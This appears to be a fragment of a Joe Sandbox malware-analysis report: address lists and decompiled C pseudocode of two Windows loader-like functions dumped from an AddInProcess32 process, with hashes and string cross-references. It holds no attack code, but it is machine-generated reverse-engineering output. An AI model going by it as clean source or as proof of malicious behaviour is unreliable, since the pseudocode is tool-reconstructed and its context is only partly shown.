0x0191e549
0x0191e54f
0x0191e553
0x0191e557
0x0191e55a
0x0191e55c
0x0191e55f
0x0191e561
0x0191e567
0x0191e56b
0x0191e7e2
0x00000000
0x0191e571
0x0191e575
0x0191e577
0x0191e57b
0x0191e57c
0x0191e57d
0x0191e57e
0x0191e57f
0x0191e588
0x0191e58f
0x0191e591
0x0191e592
0x0191e592
0x0191e596
0x0191e59e
0x0191e5a0
0x0191e5a6
0x0191e61d
0x0191e61d
0x0191e621
0x0191e623
0x0191e630
0x0191e630
0x0191e7e6
0x0191e7eb
0x0191e7ed
0x0191e7f4
0x0191e7fa
0x0191e7ff
0x0191e7ff
0x0191e80a
0x0191e812
0x0191e812
0x0191e5ab
0x0191e5b4
0x0191e5b9
0x0191e5be
0x0191e5c0
0x0191e5c2
0x0191e5c8
0x0191e5c9
0x0191e5cb
0x0191e5cc
0x0191e5d5
0x0191e5e4
0x0191e5f1
0x0191e5f8
0x0191e5f8
0x0191e5d5
0x0191e602
0x0191e616
0x0191e63d
0x0191e644
0x0191e64d
0x0191e652
0x0191e657
0x0191e659
0x0191e65b
0x0191e661
0x0191e662
0x0191e664
0x0191e665
0x0191e66e
0x0191e67d
0x0191e68a
0x0191e691
0x0191e691
0x0191e66e
0x0191e6b0
0x00000000
0x0191e6b6
0x0191e6bd
0x0191e6c7
0x0191e6d7
0x0191e6d9
0x0191e6db
0x0191e6de
0x0191e6e3
0x0191e6f3
0x0191e6fc
0x0191e700
0x0191e700
0x0191e704
0x0191e70a
0x0191e70a
0x0191e713
0x0191e716
0x0191e719
0x0191e720
0x0191e761
0x0191e76b
0x0191e774
0x0191e77a
0x0191e77a
0x0191e78a
0x0191e791
0x0191e799
0x0191e79b
0x0191e79f
0x0191e7aa
0x0191e7c0
0x0191e7ac
0x0191e7b2
0x0191e7b9
0x0191e7b9
0x0191e7c7
0x0191e806
0x00000000
0x0191e7c9
0x0191e7d1
0x0191e7d8
0x00000000
0x0191e7d8
0x00000000
0x00000000
0x0191e722
0x0191e72e
0x0191e748
0x0191e74c
0x0191e754
0x0191e756
0x0191e75c
0x0191e75c
0x00000000
0x0191e75c
0x0191e758
0x0191e758
0x00000000
0x0191e758
0x0191e750
0x00000000
0x00000000
0x0191e752
0x00000000
0x0191e752
0x0191e730
0x0191e735
0x0191e73d
0x0191e73f
0x00000000
0x00000000
0x0191e741
0x0191e741
0x00000000
0x0191e741
0x0191e739
0x00000000
0x00000000
0x0191e73b
0x00000000
0x0191e73b
0x0191e722
0x0191e720
0x0191e6b0
0x0191e618
0x00000000
0x0191e618

Strings

`, xrefs: 0191E670
`, xrefs: 0191E5D7

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 05bd713e0f8c1b43158e6809ec85bb3ed8137c110e98fc28fcee8ca1d2298712
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 5191B3316043469FE726CE29C940B1BBBE9AFC4714F14892DFA99C7284E770E944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 018D51BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E018D51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19305f0);
				E018AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018D53CA(0);
						return E018AD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0189F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01873690(1, _t117, 0x1831810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0189AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01874620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0189AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E018D500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01899860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x018d51be
0x018d51c3
0x018d51c8
0x018d51cd
0x018d51d0
0x018d51d3
0x018d51d8
0x018d51db
0x018d51de
0x018d51e0
0x018d51e3
0x018d51e6
0x018d51e8
0x018d5342
0x018d5351
0x018d5356
0x018d535a
0x018d5360
0x018d5363
0x018d5366
0x018d5369
0x018d5369
0x018d536b
0x018d536b
0x018d5370
0x018d53a3
0x018d53a4
0x018d53a6
0x018d53ab
0x018d53ab
0x018d53ae
0x018d53ae
0x018d53b5
0x018d53bf
0x018d53bf
0x018d5375
0x018d5396
0x018d53a0
0x018d53a0
0x00000000
0x018d5396
0x018d5377
0x018d5379
0x018d537f
0x018d538c
0x018d5390
0x00000000
0x018d5390
0x018d51ee
0x018d51f1
0x018d5301
0x018d5310
0x018d5315
0x018d5318
0x018d531b
0x018d5320
0x018d532e
0x018d5331
0x00000000
0x018d5331
0x018d5328
0x018d5329
0x00000000
0x018d5329
0x018d51fa
0x018d5235
0x018d5236
0x018d5239
0x018d523f
0x018d5240
0x018d5241
0x018d5242
0x018d5246
0x018d5247
0x018d524e
0x018d5251
0x018d5267
0x018d5269
0x018d526e
0x018d527d
0x018d527e
0x018d5281
0x018d5282
0x018d5287
0x018d5288
0x018d528a
0x018d528f
0x018d5294
0x00000000
0x00000000
0x018d529a
0x018d529c
0x018d529e
0x018d529e
0x018d52a4
0x018d52b0
0x00000000
0x00000000
0x018d52ba
0x018d52bc
0x018d52bc
0x018d52d4
0x018d52d9
0x018d52dc
0x018d52e1
0x00000000
0x00000000
0x018d52e7
0x018d52f4
0x00000000
0x018d52f4
0x018d5270
0x00000000
0x018d5270
0x018d51fc
0x018d51fd
0x018d5202
0x018d5203
0x018d5205
0x018d520a
0x018d520f
0x00000000
0x00000000
0x018d521b
0x018d5226
0x018d522b
0x018d521d
0x018d521d
0x018d5222
0x018d5222
0x018d522d
0x00000000

Strings

UEFI, xrefs: 018D521D
Legacy, xrefs: 018D5226

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 71c79e96267c2ef71b4ce1b9f632ef506e5381d71d6e9a19a0dae0b4997f4514
Instruction ID: 3675f3238895b4025b77706bb252707f63cca9a0d7aa466b1f041bc3fde74b5c
Opcode Fuzzy Hash: 71c79e96267c2ef71b4ce1b9f632ef506e5381d71d6e9a19a0dae0b4997f4514
Instruction Fuzzy Hash: 00516F71A007099FDB19DFA9C840AADBBF8FF55704F14402EE659EB251DB71DA00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0186D5E0 Relevance: 1.9, APIs: 1, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0186D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x194d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01866600(0x19452d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1947b9c; // 0x0
							_t281 = L01874620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0189F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1947b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x1947b8c; // 0x12e2ab8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01872280(_t200, 0x19484d8);
									_t277 =  *0x19485f4; // 0x12e2fa8
									_t351 =  *0x19485f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x12e2f40
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0186FFB0(_t287, _t353, 0x19484d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E018ACC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01866600(0x19452d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01867926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x194b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E018DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1948472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x194b218; // 0x0
														asm("ror edi, cl");
														 *0x194b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01872280(_t250, 0x19484d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01893898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0186FFB0(_t293, _t353, 0x19484d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E018937F5(_t353, 0);
																}
																E01890413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01889B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E018802D6(_t174);
																}
																L018777F0( *0x1947b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0188C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0186EC7F(_t353);
										L018819B8(_t287, 0, _t353, 0);
										_t200 = E0185F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0189B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x194b2f8; // 0x0
									if((_t206 |  *0x194b2fc) == 0 || ( *0x194b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x194b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E01906B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E01906AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0186E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0186EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E01899730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0186E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L01868F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01893C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0186d5f2
0x0186d5f5
0x0186d5f5
0x0186d5fd
0x0186d600
0x0186d60a
0x0186d60d
0x0186d617
0x0186d61d
0x0186d627
0x0186d62e
0x0186d911
0x0186d913
0x00000000
0x0186d919
0x0186d919
0x0186d919
0x0186d634
0x0186d634
0x0186d634
0x0186d634
0x0186d640
0x0186d8bf
0x00000000
0x0186d646
0x0186d646
0x0186d64d
0x0186d652
0x018bb2fc
0x018bb2fc
0x018bb302
0x018bb33b
0x018bb341
0x00000000
0x018bb304
0x018bb304
0x018bb319
0x018bb31e
0x018bb324
0x018bb326
0x018bb332
0x018bb347
0x018bb34c
0x018bb351
0x018bb35a
0x00000000
0x018bb328
0x018bb328
0x00000000
0x018bb328
0x018bb326
0x0186d658
0x0186d658
0x0186d65b
0x0186d665
0x00000000
0x0186d66b
0x0186d66b
0x0186d66b
0x0186d66b
0x0186d66d
0x0186d672
0x0186d67a
0x00000000
0x00000000
0x0186d680
0x0186d686
0x0186d8ce
0x0186d8d4
0x0186d8dd
0x0186d8e0
0x0186d68c
0x0186d691
0x0186d69d
0x0186d6a2
0x0186d6a7
0x0186d6b0
0x0186d6b5
0x0186d6e0
0x0186d6b7
0x0186d6b7
0x0186d6b9
0x0186d6b9
0x0186d6bb
0x0186d6bd
0x0186d6ce
0x0186d6d0
0x0186d6d2
0x018bb363
0x018bb365
0x00000000
0x018bb36b
0x00000000
0x018bb36b
0x00000000
0x00000000
0x00000000
